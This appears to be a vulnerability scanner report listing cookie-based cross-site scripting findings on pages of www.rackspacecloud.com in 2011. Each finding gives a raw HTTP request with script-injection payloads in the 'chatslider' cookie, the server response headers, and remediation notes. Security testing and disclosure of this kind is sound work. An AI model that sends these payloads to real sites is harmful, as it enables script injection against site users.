GET /legal/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D79b0b"><script>alert(1)</script>6254d0a4cbb; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 79984
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87a2a"%3balert(1)//c2bbba18785 was submitted in the chatslider cookie. This input was echoed as 87a2a";alert(1)//c2bbba18785 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/privacystatement/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D87a2a"%3balert(1)//c2bbba18785; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 50786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d196a"><script>alert(1)</script>e13dc99f94e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/privacystatement/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dd196a"><script>alert(1)</script>e13dc99f94e; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 50842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cb0e"%3balert(1)//d6f2b259d7 was submitted in the chatslider cookie. This input was echoed as 8cb0e";alert(1)//d6f2b259d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_cloud/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8cb0e"%3balert(1)//d6f2b259d7; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 46011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56ea"><script>alert(1)</script>861c7bc264 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_cloud/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dc56ea"><script>alert(1)</script>861c7bc264; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 46075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22d3e"><script>alert(1)</script>f77cc20f713 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D22d3e"><script>alert(1)</script>f77cc20f713; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff8cc"%3balert(1)//98bc3267138 was submitted in the chatslider cookie. This input was echoed as ff8cc";alert(1)//98bc3267138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dff8cc"%3balert(1)//98bc3267138; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bcd1"%3balert(1)//123367fac7d was submitted in the chatslider cookie. This input was echoed as 8bcd1";alert(1)//123367fac7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resellers/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8bcd1"%3balert(1)//123367fac7d; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51dd3"><script>alert(1)</script>3cf7cf94c3f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /resellers/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D51dd3"><script>alert(1)</script>3cf7cf94c3f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96657"><script>alert(1)</script>a3a64b3ba51 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /searchresults.php HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; s_cc=true; IS3_History=1296860233-1-2_4--1+6--1__4-6_; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D96657"><script>alert(1)</script>a3a64b3ba51; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.1.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:18:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6598"%3balert(1)//747fbc600a7 was submitted in the chatslider cookie. This input was echoed as a6598";alert(1)//747fbc600a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchresults.php HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; s_cc=true; IS3_History=1296860233-1-2_4--1+6--1__4-6_; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Da6598"%3balert(1)//747fbc600a7; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.1.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:18:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b05ea"%3balert(1)//9eb5c500a80 was submitted in the chatslider cookie. This input was echoed as b05ea";alert(1)//9eb5c500a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /what_is_cloud_computing HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Db05ea"%3balert(1)//9eb5c500a80; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bce1"><script>alert(1)</script>638861b9e20 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /what_is_cloud_computing HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8bce1"><script>alert(1)</script>638861b9e20; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35585
